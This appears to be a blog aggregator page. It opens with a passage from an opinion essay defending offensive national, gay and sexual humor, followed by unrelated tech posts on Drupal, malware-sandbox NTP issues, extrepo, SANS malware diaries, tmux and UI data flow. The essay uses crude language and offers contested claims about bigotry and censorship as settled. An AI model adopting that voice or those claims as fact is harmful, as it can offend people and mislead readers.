The German thinks: "The Dutchman obviously copped a feel on that blonde woman, and she hit me instead of him. That bastard!"

The Dutchman thinks: "Next tunnel, I'm gonna slap that German fucker again!"

The nationalities are close neighbors, and that means there's some sort of stereotypical, historical beef. When you change the countries, the joke's meaning can flip, depending on what your preconceptions are.

For example, when the Dutchman is the aggressor, it could be assumed he is seeking some kind of payback for Germany's aggression against the Netherlands. If you tell the version where a German slaps a Dutchman, he might personify unprovoked German aggression. The main reason the joke gets told with nationalities is the same reason it's a nun and an attractive blonde: it adds necessary color to the situation, so the characters (and the audience) can draw all sorts of wrong conclusions instantly.

It is implied that the nationalities are relevant, but never actually stated. It's misdirection to draw you in. The real punchline is that complicated explanations for simple acts of violence are not necessary. A joke about nationalist aggression can instead let you recognize universal themes, through its 4 contradictory perspectives, which bleed into a host of other sensitive topics.

It's important to know the Europe in which such jokes were routinely told was a very different place. The hint is in the "25 guilders" at the start. We didn't always have the Euro, a Customs Union, Schengen-zone visas, and fancy electric trains that connect it all. You only needed to drive a few hours in any direction to arrive at a place where you needed permission to get in, probably didn't speak the language, couldn't tell how much things cost, didn't know the local laws, and couldn't interact with the authorities. Also, these were the same people whose ancestors murdered your ancestors for the last few centuries, but they seemed okay now?

A natural response to having this right on your doorstep was to trivialize and make fun of it. And pretend it was all far away. As if to say: we're all going to be characters in a drama none of us really had any say in, so we may as well have fun with it. Some of these jokes do capture an immense amount of historical and cultural context, for example:

Heaven is where the police are British, the cooks are French, the mechanics German, the lovers Italian and it's all organized by the Swiss.

Hell is where the chefs are British, the mechanics French, the lovers Swiss, the police German and it's all organized by the Italians.

That's a condensed roast of about 150 million people covering at least a century, give or take. Those who crack such jokes don't do so in malice. When the odd Mysterious Stranger actually walked into our town, most of us would be pretty curious and friendly to them. You also wouldn't tell such a joke in front of them, unless you were on good terms (or really bad terms), and had already dropped much of the pretense. The main audience for this was our own tribe, and the goal was to relieve our collective anxiety and fear of the unknown. Letting people in on your jokes about them meant letting them hear something intimate.

In the case of the Belgians and the Dutch, it's right there in the punchlines. Our worry was e.g. that they'd outcompete us with their business acumen. Their worry was e.g. that they'd fail to win against people they considered backwards.

These are universal themes.

Speak Easy

Getting to hear people speak in an unfiltered manner, humorously or not, is an incredibly valuable thing. And I mean for reasons other than quote mining what they said and making them look bad.

One time, I was over at a house of recent friends who didn't yet know I was gay. They were cracking jokes about their gay housemate. The guy apparently used an enormous amount of toilet paper on the regular, which they were attempting to explain by pointing to his assumed sexual activities through the back door. I didn't say anything, certainly didn't want to "come out" then and there. I just laughed along and the moment passed.

There's a certain perspective today that says this was unambiguously homophobic. That such humor is bigoted and degrading to the dignity of the target demographic. That we need to stamp such material with appropriate content warnings, and that those who say it freely should apologize and do penance. That it is not only appropriate but a moral duty to intervene (and conveniently make it all about me in the process).

I for one knew these guys were cracking jokes exactly because they didn't dare bring it up with the person in question. Asking about someone else's toilet issues is not exactly casual small talk. Once you connect humor with taboos, it's really no coincidence that potty humor is a thing.

I also think that if they had known I was gay, they wouldn't have joked around, or been embarrassed after, and then it would have been a Big Thing. The way it went, a concern about a person they shared a house with could be brought up and made legible. I joined the "one of the guys" dynamic, by understanding its rules, context and intent. I can get the same effect now just by saying something funny and insensitive about gay people behind closed doors, to show that it's not a personal landmine at all.

It's also entirely in line with existing LGBT culture. Drag queens in particular have used sass and mockery as a shield, but no mockery is complete without self-mockery. The Adventures of Priscilla: Queen of the Desert (1994) showed everyone how it's done:

The John Cleese quote about a wiser part short circuiting a closed system of thought sounds dead-on to me.

It also reinforces that humor is entirely contextual, because its goal is to dance on the edge of what is actually permissible to say and think. Whatever the current taboos are, whatever's currently the most closed-minded, that's what comedy is most attracted to.

For a great illustration of this, consider two scenes, two years apart. First, the opening to 1999's American Pie:

The lead character is caught jerking off to illegal TV porn by his conservative parents, and the scene is played mostly straight. Situated in its own time as a mainstream American movie, this was pretty raunchy, and reflected common Christian taboos around teenage sex. Particularly when you factor in the titular American Pie which also ends up losing its virginity. A moment so memorable, NYT dedicated a piece to it 20 years later. If anyone was offended by this at the time, it was people who resembled the parents and found it difficult to think or talk about sex without blushing.

These days though, the people who consider this movie offensive would come from the politically opposite side of the spectrum. Reasons cited include the sexism, the gay jokes, and so on. If you believe the press there's loads of detractors now, but really I think they just wanted an excuse to post a video of a young man pretending to fuck apple pie for the clicks.

What's more interesting is how this scene was itself parodied in 2001's Not Another Teen Movie. There's a lot to say about that film, because it's a meticulous fusion of 1980s and 1990s teenage movie tropes. It refuses to take itself seriously precisely by taking the source material very seriously, with stellar performances. The opening is a direct homage to American Pie, which turns everything about that scene up to 11 and exaggerates it beyond proportion:

It makes perfect sense when you consider what the common objection was at the time: on-screen teenage sexuality and an acknowledgement of taboo hormonal urges. Instead of a shy nerdy guy with a sock, we have a fearless girl with a comically large pink vibrator. Everyone walks in on it, even grandma and the local pastor. It ends with a whipped cream bukkake, cue the opening titles. The rest of the movie continues this line of subverting source material while throwing in a heavy dose of potty, sex and other gags. It only misses the mark a few times, really, like when it tries to stretch a Token Black Character joke for the entire movie.

If you thought the butt of this was women, or LGBTs, or black people, you'd be missing the point entirely. It was a middle finger aimed at puritan scolds who also spent their time chastising alien sideboob in video games they had never even played.

Most importantly, audiences thought it was genuinely hilarious.

The Humorton Window

I've mostly stuck to examples that feel dated now, and in the first case, downright provincial.

Jokes about national rivalry have diminished, for the simple reason that the unknown has diminished. After opening European borders and harmonizing the economic and legal systems, we have a legible continent where countries can easily and freely compare notes. We don't need to joke about who would run things best anymore; we can just go look at the COVID numbers.

When you still encounter this sort of national humor, it's more in the context of April Fools or "shitposting", like the pair of dueling memes:

G E K O L O N I Z E E R D (Colonized)
G E F E D E R A L I Z E E R D (Federalized)

Usually posted by a Dutchman or a Belgian respectively, referring to Dutch imperialism and Belgian bureaucracy, to signify that one demographic seems particularly dominant in a thread or space. It is only properly used when ironic; otherwise it is simply tiresome.jpg.

Sexual humor has also reduced in relevance, because the internet offers unlimited access to both pornography and genuine sex-ed, removing all the basic taboos around it. Rather than a bunch of confused college dudes wondering exactly how gay sex works, you now have guys who tried watching some of it, didn't get aroused by it, and simply moved on.

There are shifting windows of what is a) acceptable and b) popular to laugh at. There's also a saying, "To learn who rules over you, simply find out who you are not allowed to criticize." This counts doubly so for "or joke about."

This is commonly and falsely attributed to Voltaire but oddly enough appears to originate from a 1993 essay by an actual, genuine, bona fide white nationalist. TIL.

The question of who said it is of course irrelevant, the question is whether it is true or not. A common refutation is that it is disallowed to mock e.g. the mentally disabled, who clearly do not rule over others. But that's a cop out, because doing so lures out those who do have power to punish people for it, namely all sorts of organizations that ostensibly advance the rights of particular groups.

The problem with this system is that it is driven by attention, not by effectiveness. This is described perfectly in the essay The Toxoplasma of Rage, written by recently unmasked blogger Scott Alexander Ocasio-Cortez. When the actions that are rewarded are those that get the most attention, this tends to amplify rather than reduce tensions between different interest groups, by breeding more resentment.

It also tends to confuse the people who already have means and access with those with need of it. As an example of this dynamic, there was a story here a few years ago: an elderly Jewish woman in distress had called a stand-by nurse (iirc). Upon learning that she was Jewish, the nurse scolded her for the collective sins of Israel against Palestine and was rude and unhelpful. I know about this because the next day it was in every major newspaper, after being highlighted by a Jewish interest organization.

The outcome would be very different if e.g. someone was mistreated because they were homeless or a drug addict. It would be pretty much impossible for someone like that to get any serious restitution or acknowledgement here. Whether you call that being in charge or not, it represents two vastly different tiers of access and service, differentiated purely by whom you are not allowed to generalize against.

Another common refutation of not-Voltaire is the success of comedians like Dave Chappelle or Bill Burr, who both brought new material highly critical of cancel culture and organized "alphabet people" (LGBTQIAA2+). They invited prophecies of professional and personal doom, but came out more popular than ever. Ricky Gervais' semi-annual Golden Globes speeches are in a similar vein, with the recurring gag that he'll never be invited again, as he roasts some of the wealthiest people to their faces:

Many correctly point out that none of the comedians' careers or lifestyles are in danger. They are multi-millionaires with successful projects under their belts. That is of course why they get to do it. When people who don't have "fuck you money" or big brass balls crack jokes like that, they make themselves a target, and those with means and motive go in for the kill. The saying is of course "find out who rules over you," not over them.


I find this fascinating because it reveals humor as a sort of "Romulan Neutral Zone" on the edge of the usual political Overton Window. This larger zone covers not just what is acceptable, but also what is currently contested. The jokes are the ammo, but the armor is self-confidence derived from skill and success. Comedians play this game on Nightmare difficulty every show night.

This zone consists of ideas which humor is effective at working its magic on. It alters or refutes our worldview with condensed bursts of hidden wisdom or absurdity. But they must be within our grasp to untangle. Humor's range is subject to its own constraints, such as "Too Soon", "That's NOT Funny", "I'm Going To Hell For Laughing" and "I Don't Get It". These are completely subjective limits, which are negotiated and renegotiated between the joke tellers and their audience. If you don't believe me, take the joke about the 51 straws, and replace "Dutch" with "Jewish".

But if you think that means the Jews rule over you, you're refusing to see how these things actually work. What actually rules over you is people's chronic and miscalibrated fear that you might not be kidding, which occurs in highly variable degrees. This might also be a good explanation for the common saying that if you want to tell people something they don't want to hear, you need to make them laugh, or they'll kill you for saying it. Good humor is a successful mental defense against thinking that is too rigid and dogmatic.

The case of Mark Meechan is highly illustrative. This is the Scot who was convicted of "grossly offensive behavior" for teaching his pug-dog to do a Nazi salute, upon hearing "Gas the Jews". He has always claimed he did it purely to annoy his girlfriend. "Justice" in this case includes a court ruling that "context and intent" are officially irrelevant to the matter, an absolute bombshell in legal precedent. But that's not the most absurd part. It's the BBC documentary on the issue afterwards, in which one of the detractors jokingly asks his own cat if it too wants to "Gas the Jews," before concluding no. By the logic of a British court, he is guilty of the same kind of punishable offense, and the video is the only proof necessary.

They looked at a person whose only crime was to make jokes they found offensive, and they thought this made him a credible threat to their entire way of life. In their panicked response, they actually started destroying one of the foundations of that way of life. They haven't stopped yet.

It's a joke, but the penny has yet to drop.

* * *

Humor seems to be far from just a random evolutionary quirk, or a meaningless pastime. It is a fundamental mechanism that we individually and collectively use to sanity-check ourselves. Humor highlights the boundaries of where we might be wrong, and it helps us cut through hangups and taboo.

It seems to happen when a joke activates surprising and contradictory signals, all at the same time. If we can successfully resolve them using our larger understanding of the world, we can acknowledge something new and true. This also implies that when the humor police show up, they are a symptom of a collective lack of understanding and of unacknowledged taboos.

When we ban fun and mockery, we ban challenging insights, and we do so at our own peril.

Cover Image - Chad and Virgin Laughing

Do not assume the US still aspires to be a world leader. Put differently: it is time for an EU army.

She also said: the UK will have to “live with the consequences” of Boris Johnson  ditching Theresa May’s plan to maintain close economic ties with the EU after Brexit.

Asked whether a no-deal Brexit would be a personal defeat for her, she answered: "No. It would, of course, be in Britain's and all EU member states' interests to achieve an orderly departure. But that can only happen if it is what both sides want."

Her Germany is ready, no matter what. She made it so. And she's telling you.

June 26, 2020

I get eaten by the worms and … For 2 seconds the drums seem to announce this is just a cover but then the beat changes drastically and you’re left wondering what happened while the different vibe grows on you. You (almost) have goosebumps when the bridge happens and you stop breathing to hear it all and then, after that bridge, everything comes together and you’re floating on those familiar minor 9th chord arpeggios and those fabulous voices until all fades out and you hit repeat.


As part of the cron.weekly newsletter, I want to test the plain-text version of the mail as much as possible.

June 25, 2020

Given the impact of COVID-19 on organizations' budgets, we extended Drupal 7's end-of-life date by one year. Drupal 7 will receive security updates until November 2022, instead of November 2021. For more information, see the official announcement.

Extending the lifetime of Drupal 7 felt like the right thing to do. It's aligned with Drupal's goal to build software that is safe for everyone to use.

I wish more software was well-maintained like Drupal is. We released Drupal 7 almost a decade ago and continue to care for it.

We often recognize those who help innovate or introduce new features. But maintaining existing Open Source software also relies on the contributions of individuals and organizations. Today, I'd like us to praise those who maintain and improve Drupal 7. Thank you!

June 17, 2020

If it’s common to say that “Everything is a Freaking DNS problem“, other protocols can also be the source of problems… NTP (“Network Time Protocol”) is also a good candidate! A best practice is to synchronize all your devices via NTP but also to set up the same timezone! We learn by doing mistakes and I wanted to share this one with you.

After spending time debugging, I finally found why many of the automated submissions to my malware analysis sandbox failed. It was due to the timezone and… NTP!

When you prepare a sandbox system, it must be based on guest images. These images have to reflect your “environment”: your usual tools must be installed (Microsoft Office, a PDF reader, a browser, etc.). To achieve this, I usually start from a standard Windows image that I clone and then fine-tune to match my requirements. The problem is that, by default, the Windows operating system synchronizes itself automatically with the Microsoft NTP servers:

How is the guest image used by the sandbox system? When your environment is ready, you take a snapshot. Later, to analyze a malicious file, the sandbox system will restore the snapshot, copy the file to it and execute it. The snapshot being a “picture” of the system, the date & time are also frozen and, when you restore it, the clock continues to run from the time the snapshot was taken. That’s why the sandbox must update the time:

2020-06-04 11:48:17,428 [root] INFO: Date set to: 20200615T00:31:18, timeout set to: 300

(Note that it’s a classic feature. Some malware must be analyzed at a specific time or date to ensure that it will execute properly!)

My last snapshot was created on 2020/06/04 11:48:17 and the analysis started on 2020/06/15 00:31:18:

2020-06-15 00:31:18,734 [root] DEBUG: Starting analyzer from: C:\tmpv556hytw
2020-06-15 00:31:18,734 [root] DEBUG: Storing results at: C:\FMiZIvH
2020-06-15 00:31:18,734 [root] DEBUG: Pipe server name: \\.\PIPE\nRwJWEHQaG
2020-06-15 00:31:18,734 [root] DEBUG: Python path: C:\Users\user01\AppData\Local\Programs\Python\Python38-32
2020-06-15 00:31:18,734 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-06-15 00:31:18,734 [root] INFO: Automatically selected analysis package "exe"

But suddenly, I saw this in the log:

2020-06-15 00:31:31,359 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00860000.
2020-06-15 02:32:18,074 [root] INFO: Analysis timeout hit, terminating analysis.
2020-06-15 02:32:18,074 [lib.api.process] ERROR: Failed to open terminate event for pid 3392
2020-06-15 02:32:18,074 [root] INFO: Terminate event set for process 3392.
2020-06-15 02:32:18,074 [root] INFO: Created shutdown mutex.
2020-06-15 02:32:19,073 [root] INFO: Shutting down package.
2020-06-15 02:32:19,073 [root] INFO: Stopping auxiliary modules.

You can see that the system time suddenly jumped two hours ahead (00:31 to 02:32), so the sandbox hit its timeout and stopped the analysis. Why?

The sandbox is running in UTC (tip: it’s always good to use UTC as a standard timezone to avoid issues when correlating events) but my original Windows guest was running in the CET timezone (UTC+2 with summer time) and NTP synchronization was left configured by default. When the snapshot is restored, the operating system runs as usual and, at regular intervals, synchronizes its internal clock via NTP…

Conclusion: do NOT configure NTP in your sandbox guest images, to save yourself some headaches with broken analyses!
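If you build your guest images from a stock Windows install, the synchronization can be turned off before taking the snapshot. A minimal sketch using the standard Windows Time service tooling (run in an elevated prompt; double-check the behavior against your Windows version):

```shell
REM Run *before* taking the snapshot:
REM stop the Windows Time service and keep it from starting again.
net stop w32time
sc config w32time start= disabled
```

With the service disabled, the restored snapshot keeps whatever time the sandbox sets, instead of silently re-syncing mid-analysis.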

The post When NTP Kills Your Sandbox appeared first on /dev/random.

Just over 7 months ago, I blogged about extrepo, my answer to the "how do you safely install software on Debian without downloading random scripts off the Internet and running them as root" question. I also held a talk during the recent "MiniDebConf Online" that was held, well, online.

The most important part of extrepo is "what can you install through it". If the number of available repositories is too low, there's really no reason to use it. So, I thought, let's look what we have after 7 months...

To cut to the chase, there's a bunch of interesting content there, although not all of it has a "main" policy. Each of these can be enabled by installing extrepo, and then running extrepo enable <reponame>, where <reponame> is the name of the repository.
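As a concrete illustration, enabling one of the repositories from the list below looks like this (a sketch; run as root, and note that the final package name `codium` is my assumption for illustration, not taken from the post):

```shell
# Install extrepo itself, then enable one of the listed repositories
apt install extrepo
extrepo enable vscodium

# The enabled repository then behaves like any other APT source
apt update
apt install codium   # package name assumed for illustration
```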

Note that the list is not exhaustive, but I intend to show that even though we're nowhere near complete, extrepo is already quite useful in its current state:

Free software

  • The debian_official, debian_backports, and debian_experimental repositories contain Debian's official, backports, and experimental repositories, respectively. These shouldn't have to be managed through extrepo, but then again it might be useful for someone, so I decided to just add them anyway. The config here uses the alias for CDN-backed package mirrors.
  • The belgium_eid repository contains the Belgian eID software. Obviously this is added, since I'm upstream for eID, and as such it was a large motivating factor for me to actually write extrepo in the first place.
  • elastic: the elasticsearch software.
  • Some repositories, such as dovecot, winehq and bareos, contain upstream versions of their respective software. These repositories contain software that is available in Debian, too; but their upstreams package their most recent releases independently, and some people might prefer to run those instead.
  • The sury, fai, and postgresql repositories, as well as a number of repositories such as openstack_rocky, openstack_train, haproxy-1.5 and haproxy-2.0 (there are more) contain more recent versions of software packaged in Debian already by the same maintainer of that package repository. For the sury repository, that is PHP; for the others, the name should give it away.

    The difference between these repositories and the ones above is that it is the official Debian maintainer for the same software who maintains the repository, which is not the case for the others.

  • The vscodium repository contains the unencumbered version of Microsoft's Visual Studio Code; i.e., the codium version of Visual Studio Code is to code as the chromium browser is to chrome: it is a build of the same software, but without the non-free bits that make code not entirely Free Software.
  • While Debian ships with at least two browsers (Firefox and Chromium), additional browsers are available through extrepo, too. The iridiumbrowser repository contains a Chromium-based browser that focuses on privacy.
  • Speaking of privacy, perhaps you might want to try out the torproject repository.
  • For those who want to do Cloud Computing on Debian in ways that aren't covered by Openstack, there is a kubernetes repository that contains the Kubernetes stack, as well as the google_cloud one containing the Google Cloud SDK.

Non-free software

While these are available to be installed through extrepo, please note that non-free and contrib repositories are disabled by default. In order to use them, you must first enable the corresponding policies; this can be accomplished through /etc/extrepo/config.yaml.

  • In case you don't care about freedom and want the official build of Visual Studio Code, the vscode repository contains it.
  • While we're on the subject of Microsoft, there's also Microsoft Teams available in the msteams repository. And, hey, skype.
  • For those who are not satisfied with the free browsers in Debian or any of the free repositories, there's opera and google_chrome.
  • The docker-ce repository contains the official build of Docker CE. While this is the free "community edition" that should have free licenses, I could not find a licensing statement anywhere, and therefore I'm not 100% sure whether this repository is actually free software. For that reason, it is currently marked as a non-free one. Merge Requests for rectifying that from someone with more information on the actual licensing situation of Docker CE would be welcome...
  • For gamers, there's Valve's steam repository.

Again, the above lists are not meant to be exhaustive.

Special thanks go out to Russ Allbery, Kim Alvefur, Vincent Bernat, Nick Black, Arnaud Ferraris, Thorsten Glaser, Thomas Goirand, Juri Grabowski, Paolo Greppi, and Josh Triplett, for helping me build the current list of repositories.

Is your favourite repository not listed? Create a configuration based on template.yaml, and file a merge request!

June 16, 2020

I published the following diary on “Sextortion to The Next Level“:

For a long time, our mailboxes have been flooded with emails from “hackers” (note the quotes) who pretend to have infected our computers with malware. The scenario is always the same: they claim to have collected sensitive pieces of evidence about us (usually, men visiting adult websites) and request some money to be paid in Bitcoin, or they will disclose everything. We reported this kind of malicious activity for the first time in 2018. Attacks evolved over time and they improved their communication by adding sensitive information like a real password (grabbed from major data leaks) or mobile phones… [Read more]

The post [SANS ISC] Sextortion to The Next Level appeared first on /dev/random.

Mautic released

A year ago, Acquia acquired Mautic. Mautic is an Open Source marketing automation and campaign management platform.

Some of you have been wondering: What has been going on since the acquisition? It's high time for an update!

Mautic 3 released

Mautic 3 was released last night. It is the first major release in four years, and a big milestone!

I'd like to extend a big thank you to everyone who contributed to Mautic 3. I'm also proud to say that Acquia was the largest contributor.

For me personally, it was nice to see some long-term Drupal developers contribute to Mautic 3. When Acquia acquired Mautic, I hoped to see cross-pollination between Drupal and Mautic.

A streamlined release model for Mautic 4

The Mautic 3 release was mostly an "under the hood" release. The focus was on upgrading and modernizing Mautic's underlying frameworks (e.g. Symfony and other dependencies).

We want Mautic 4 to offer some much-requested new features. In order to do so, Mautic is switching to a new innovation and release model. Instead of having to wait almost four years for a major release with new features, there will be four Mautic releases with new features each year.

The Drupal community went through a similar transformation five years ago. The Drupal community now brings more value to its users in less time. Because of the faster innovation cycle, Drupal also has more active contributors than ever before.

A quarterly release cycle creates a healthy heartbeat for an Open Source project. You can expect Mautic to deliver improvements more frequently and predictably moving forward.

A streamlined governance model

As a young Open Source project, Mautic was lacking clearly defined roles and responsibilities. For example, it was unclear to many (including me) how the Open Source project and Mautic, Inc., the for-profit company, best collaborated.

With the acquisition by Acquia, the need for clear roles and responsibilities became even more pressing.

One of the first things Acquia did post-acquisition was to develop a new governance model in collaboration with the Mautic community.

Mautic's new governance model defines different teams and working groups, how the community and Acquia collaborate, and more. With roles and responsibilities more clearly defined, we can go faster together.

A new project lead

I'm also excited to share that Ruth Cheesley is Mautic's new Project Lead.

Ruth has been involved with Mautic for a long time, and prior to Mautic, was on Joomla!'s Community Leadership Team. She is also a member of Drupal's Community Working Group. Ruth works at Acquia. As she is part of my team, I've been working closely with Ruth for the past 6+ months and could not be more excited about her involvement and new role.

Ruth has the full support of Acquia, Mautic's community leadership team, and DB Hurley, Mautic's founder and previous Project Lead. A big thank you to DB for his leadership and having guided Mautic thus far — getting an Open Source project off the ground and to this stage is no small feat.


With a new governance model, leadership structure, as well as a new release and innovation model for Mautic, we're set up well to accelerate and innovate for the long run.

June 13, 2020

bulky T510 and tiny n135When my Thinkpad x250 broke down last week with what appears to be a motherboard failure, I tried to convince my daughter to hand over her T410 but work-from-home-schooling does not work without a computer, so she refused. Disillusioned in my diminishing parenting powers, I dug up my 10 year old Samsung n135 netbook instead. It still had Ubuntu 14.10 running and the battery was pining for the fjords, but after buying a new battery (€29), updating Ubuntu to 18.04 LTS and switching to Lubuntu it really is usable again.

Now to be honest, I did get a replacement laptop (a bulky T510 with only 4GB of RAM) with my own SSD inside from my supplier, so I’m not using that old netbook full-time, but I'm happy to have it running smoothly nonetheless.

The future, to end this old-fashioned geekery off with, will very likely be a Dell XPS-13 9300 (yep, I’ll be cheating on Lenovo) on which I’ll happily install Ubuntu 20.04 LTS. I’ve upgraded my wife’s x240 to that already and I must say it runs smoothly and looks great compared to 18.04, which I’m still running.

June 12, 2020

I published the following diary on “Malicious Excel Delivering Fileless Payload“:

Macros in Office documents are so common today that my honeypots and hunting scripts catch a lot of them daily. I try to keep an eye on them because sometimes you can spot an interesting one (read: “using a less common technique”).  Yesterday, I found such a sample that deserve a quick diary… [Read more]

The post [SANS ISC] Malicious Excel Delivering Fileless Payload appeared first on /dev/random.

June 11, 2020

I published the following diary on “Anti-Debugging JavaScript Techniques“:

For developers who write malicious programs, it’s important to make their code not easy to read or execute in a sandbox. Like most languages, JavaScript offers many ways to make the life of malware analysts more difficult (or more exciting, depending on the side of the table you’re sitting on ;-).

Besides being an extremely permissive language with its syntax and making it easy to obfuscate, JavaScript can also implement anti-debugging techniques. A well-known technique is based on the method arguments.callee(). This method allows a function to refer to its own body… [Read more]

The post [SANS ISC] Anti-Debugging JavaScript Techniques appeared first on /dev/random.

If you’re a bit like me, you’re probably impatient. You want things to move quickly. There’s no time to waste!

June 09, 2020

After more than 2 years of building Oh Dear, I still struggle with the most fundamental question: how are users finding our application and where should we focus our marketing efforts to maximize that?

June 07, 2020

tmux upgrade from 2.8 to 3.0...

The old per-attribute border options

# invisible separators (tmux <= 2.8)
set-option -g pane-border-fg black
set-option -g pane-border-bg black
set-option -g pane-active-border-fg black
set-option -g pane-active-border-bg black

became the combined -style options

# invisible separators (tmux >= 3.0)
set -g pane-border-style bg=black,fg=black
set -g pane-active-border-style bg=black,fg=black

as mentioned in the changelog.

June 04, 2020

I published the following diary on “Anti-Debugging Technique based on Memory Protection“:

Many modern malware samples implement defensive techniques. First of all, we have to distinguish between sandbox-evasion and anti-debugging techniques. Today, sandboxes are an easy and quick way to categorize samples based on their behavior. Malware developers have plenty of tests to perform to detect the environment running their code; some examples: testing the disk size, the desktop icons, the uptime, processes, network interfaces' MAC addresses, hostnames, etc… [Read more]

The post [SANS ISC] Anti-Debugging Technique based on Memory Protection appeared first on /dev/random.

This post shares some ideas about working with cronjobs, to help make common tasks easier for both junior and senior sysadmins.

June 03, 2020

Today, we released Drupal 9.0.0! This is a big milestone because we have been working on Drupal 9 for almost five years.

I updated my site to run Drupal 9 earlier today. It was easy!

As I write this, I'm overwhelmed by feelings of excitement and pride. There is something very special about building and releasing software with thousands of people around the world.

However, I find myself conflicted between today's successful launch and the tragic events in the United States. I can't go about business as usual. Discrimination is the greatest threat to any community, Drupal included.

I have always believed that Drupal is a force for good in the world. People point to our community as one of the largest, most diverse and most supportive Open Source projects in the world. While we make mistakes and can always be better, it's important that we lead by example. That starts with me. I am committing to the community that I will continue to learn more, and fight for equality and justice. I can and will do more. Above all else, it's important to stand in solidarity with Black members of the Drupal community — and the Black community at large.

During this somber time, I remain incredibly proud of our community for delivering Drupal 9. We did this together, as a global community made up of people from different races, ethnicities, genders, and national origins. It gives me some needed positivity.

If you haven't looked at Drupal in a while, I recommend you look again. Compared to Drupal 8.0.0, Drupal 9 is more usable, accessible, inclusive, flexible, and scalable than previous versions. We made so much progress on such important things:

  • Drupal 9 is dramatically easier to use for marketers
  • Drupal 9 is easier to maintain and upgrade for developers
  • Drupal is innovating with its headless or decoupled capabilities

It's hard to describe the amount of innovation and care that went into Drupal since the first release of Drupal 8 almost five years ago. To try and grasp the scale, consider this: more than 4,500 individuals contributed to Drupal core during the past 4.5 years. During that time, the number of active contributors increased by almost 50%. Together, we created the most author-friendly and powerful version of Drupal to date.

Thank you to everyone who made Drupal 9 happen.

June 02, 2020

... isn't ready yet, but it's getting there.

I had planned to release a new version of SReview (my online video review and transcoding system that I originally wrote for FOSDEM but that is used for DebConf, too) after it was set up and running properly for FOSDEM 2020. However, things got a bit busy (both in my personal life and in the world at large), so it fell a bit by the wayside.

I've now also been working on things a bit more, in preparation for an improved administrator's interface, and have started implementing a REST API to deal with talks etc through HTTP calls. This seems to be coming along nicely, thanks to OpenAPI and the Mojolicious plugin for parsing that. I can now design the API nicely, and autogenerate client side libraries to call them.

While at it, because libmojolicious-plugin-openapi-perl isn't available in Debian 10 "buster", I moved the docker containers over from stable to testing. This revealed that both bs1770gain and inkscape changed their command line incompatibly, resulting in me having to work around those incompatibilities. The good news is that I managed to do so in a way that keeps running SReview on Debian 10 viable, provided one installs Mojolicious::Plugin::OpenAPI from CPAN rather than from a Debian package. Or installs a backport of that package, of course. Or, heck, uses the Docker containers in a kubernetes environment or some such -- I'd love to see someone use that in production.

Anyway, I'm still finishing the API, and the implementation of that API and the test suite that ensures the API works correctly, but progress is happening; and as soon as things seem to be working properly, I'll do a release of SReview 0.6, and will upload that to Debian.

Hopefully that'll be soon.

June 01, 2020

I created a PHP package that can make it easier to work with percentages in any PHP application.

May 28, 2020

The reason software isn't better is because it takes a lifetime to understand how much of a mess we've made of things, and by the time you get there, you will have contributed significantly to the problem.
Two software developers pairing up on a Rails app

The fastest code is code that doesn't need to run, and the best code is code you don't need to write. This is rather obvious. Less obvious is how to get there, or who knows the way. Every coder has their favored framework or language, their favored patterns and practices. Advice on what to do is easy to find. Rarer is advice on what not to do. They'll often say "don't use X, because of Y," but that's not so much advice as it is a specific criticism.

The topic interests me because significant feats of software engineering often don't seem to revolve around new ways of doing things. Rather, they involve old ways of not doing things. Constraining your options as a software developer often enables you to reach higher than if you hadn't.

Many of these lessons are hard learned, and in retrospect often come from having tried to push an approach further than it merited. Some days much of software feels like this, as if computing has already been pushing our human faculties well past the collective red line. Hence I find the best software advice is often not about code at all. If it's about anything, it's about data, and how you organize it throughout its lifecycle. That is the real currency of the coder's world.

Usually data is the ugly duckling, relegated to the role of an unlabeled arrow on a diagram. The main star is all the code that we will write, which we draw boxes around. But I prefer to give data top billing, both here and in general.

One-way Data Flow

In UI, there's the concept of one-way data flow, popularized by the now omnipresent React. One-way data flow is all about what it isn't, namely not two-way. This translates into benefits for the developer, who can reason more simply about their code. Unlike traditional Model-View-Controller architectures, React is sold as being just the View.

Expert readers however will note that the original trinity of Model-View-Controller does all flow one way, in theory. Its View receives changes from the Model and updates itself. The View never talks back to the model, it only operates through the Controller.

model view controller

The reason it's often two-way in practice is because there are lots of M's, V's and C's which all need to communicate and synchronize in some unspecified way:

model view controller - data flow

The source of truth is some kind of nebulous Ur-Model, and each widget in the UI is tied to a specific part of it. Each widget has its own local model, which has to bi-directionally sync up to it. Children go through their parent to reach up to the top.

When you flatten this, it starts to look more like this:

model view controller - 2-way data flow

Between an original model and a final view must sit a series of additional "Model Controllers" whose job it is to pass data down and to the right, and vice versa. Changes can be made in either direction, and there is no single source of truth. If both sides change at the same time, you don't know which is correct without more information. This is what makes it two-way.

model view controller - one-way stateless data flow

The innovation in one-way UI isn't exactly to remove the Controller, but to centralize it and call it a Reducer. It also tends to be stateless, in that it replaces the entire Model for every change, rather than updating it in place.

This makes all the intermediate arrows one-way, restoring the original idea behind MVC. But unlike most MVC, it uses a stateless function f: model => views to derive all the Views from the Ur-Model in one go. There are no permanent Views that are created and then set up to listen to an associated Model. Instead Views are pure data, re-derived for every change, at least conceptually.
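A minimal sketch of this pattern, in Python rather than any particular UI framework (all names here are illustrative, not a real API): a stateless reducer replaces the entire model per change, and a pure function derives the views from it in one go.

```python
# One-way data flow: a stateless reducer plus a pure f(model) -> views.

def reducer(model, action):
    # Replace the whole model for every change; never mutate in place.
    if action["type"] == "set_title":
        return {**model, "title": action["value"]}
    return model

def render(model):
    # Views are pure data, re-derived from the model in one go.
    return {"header": model["title"].upper(), "body": model["items"]}

model = {"title": "draft", "items": []}
model = reducer(model, {"type": "set_title", "value": "final"})
views = render(model)
```

Changes only ever flow model → reducer → views; there is no path for a view to write back into the model except by dispatching a new action.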

In practice there is an actual trick to making this fast, namely incrementalism and the React Reconciler. You don't re-run everything, but you can pretend you do. A child is guaranteed to be called again if a parent has changed. But only after giving that parent, and its parents, a chance to react first.

Even if the Views are a complex nested tree, the data flow is entirely one way except at the one point where it loops back to the start. If done right, you can often shrink the controller/reducer to such a degree that it may as well not be there.

Much of the effort in developing UI is not in the widgets but in the logic around them, so this can save a lot of time. Typical MVC instead tends to spread synchronization concerns all over the place as the UI develops, somewhat like a slow but steadily growing cancer.

The solution seems to be to forbid a child from calling or changing the state of its parent directly. Many common patterns in old UI code become impossible and must be replaced with alternatives. Parents do often pass down callbacks to children to achieve the same thing by another name. But this is a cleaner split, because the child component doesn't know who it's calling. The parent can decide to pass-through or decorate a callback given to it by its parent, and this enables all sorts of fun composition patterns with little to no boilerplate.
